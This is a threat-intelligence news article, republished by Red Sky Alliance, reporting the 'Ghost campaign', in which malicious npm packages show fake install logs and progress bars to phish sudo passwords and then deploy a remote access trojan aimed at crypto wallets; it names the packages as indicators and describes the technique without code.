Cybersecurity researchers have spotted a sneaky new trick used by hackers to compromise developers’ computers. This latest threat, which first appeared at the beginning of February 2026, involves malicious code hidden inside npm packages, which programmers use to create apps. According to researchers at ReversingLabs, this specific attack, dubbed the Ghost campaign, tricks users into thinking they are installing a helpful tool. The software is busy stealing private data in the background.[1]
In total, researchers detected seven malicious packages, including react-state-optimizer-core, carbon-mac-copy-cloner@1.1.0, and multiple versions of coinbase-desktop-sdk. All were published by a single user going by the handle mikilanjillo.
The art of the fake log - What makes this attack stand out is how it hides its tracks. Usually, when you install software, you see text scrolling by or a loading bar. The hackers created fake versions of these screens to make everything look legitimate. The research, which was shared with Hackread.com, pointed to a package called react-state-optimizer-core as a prime example of this tactic. “The sophistication comes from its novel technique of using fake npm install logs to hide malicious activity,” researchers noted. The software even mimics a lagging connection by adding random pauses and a fake progress bar. While this happens, the program asks the user for their sudo passwords, the master key to a computer’s system, claiming it is needed for optimization purposes or to fix errors.
New Ghost Vampaign Uses Fake npm Progress Bars to Phish Sudo Passwords. Fake npm install logs and sudo password prompt (Image credit: ReversingLabs)
Hunting for crypto wallets - Once the user enters that password, the trap is set. The goal is to deploy a Remote Access Trojan (RAT), which is a virus that lets a hacker control a computer from a remote location. This specific virus is designed to hunt for cryptocurrency wallets and sensitive personal data.
Some versions, such as carbon-mac-copy-cloner@1.1.0 and coinbase-desktop-sdk, even include a separate decryptor file to help the virus unlock stolen files. The hackers used clever hiding spots for their instructions; most packages pulled data from a Telegram channel, though version 1.5.19 of the Coinbase SDK used the site teletype.in to stay under the radar.
Is this a sign of things to come? This might just be the start of a larger wave of attacks. On 8 March 2026, a firm called JFrog found a similar malicious package named @openclaw-ai/openclawai, suggesting the Ghost campaign could have been a test run.
Some versions, like coinbase-desktop-sdk@1.5.14, even contained debug messages (notes left by the hackers while they were still building the tool). As we know it, cyber criminals are always evolving, and these fake loading screens are a clever new way to keep users from spotting the danger.
This article is shared at no charge for educational and informational purposes only.
Red Sky Alliance is a Cyber Threat Analysis and Intelligence Service organization. We provide indicators of compromise information (CTI) via a notification service (RedXray) or an analysis service (CTAC). For questions, comments or assistance, please contact the office directly at 1-844-492-7225, or feedback@redskyalliance.com
Weekly Cyber Intelligence Briefings:
- Reporting: https://www.redskyalliance.org/
- Website: https://www.redskyalliance.com/
- LinkedIn: https://www.linkedin.com/company/64265941
Weekly Cyber Intelligence Briefings:
REDSHORTS - Weekly Cyber Intelligence Briefings
https://register.gotowebinar.com/register/5207428251321676122
[1] https://hackread.com/ghost-campaign-npm-progress-bars-phish-sudo-passwords/
Comments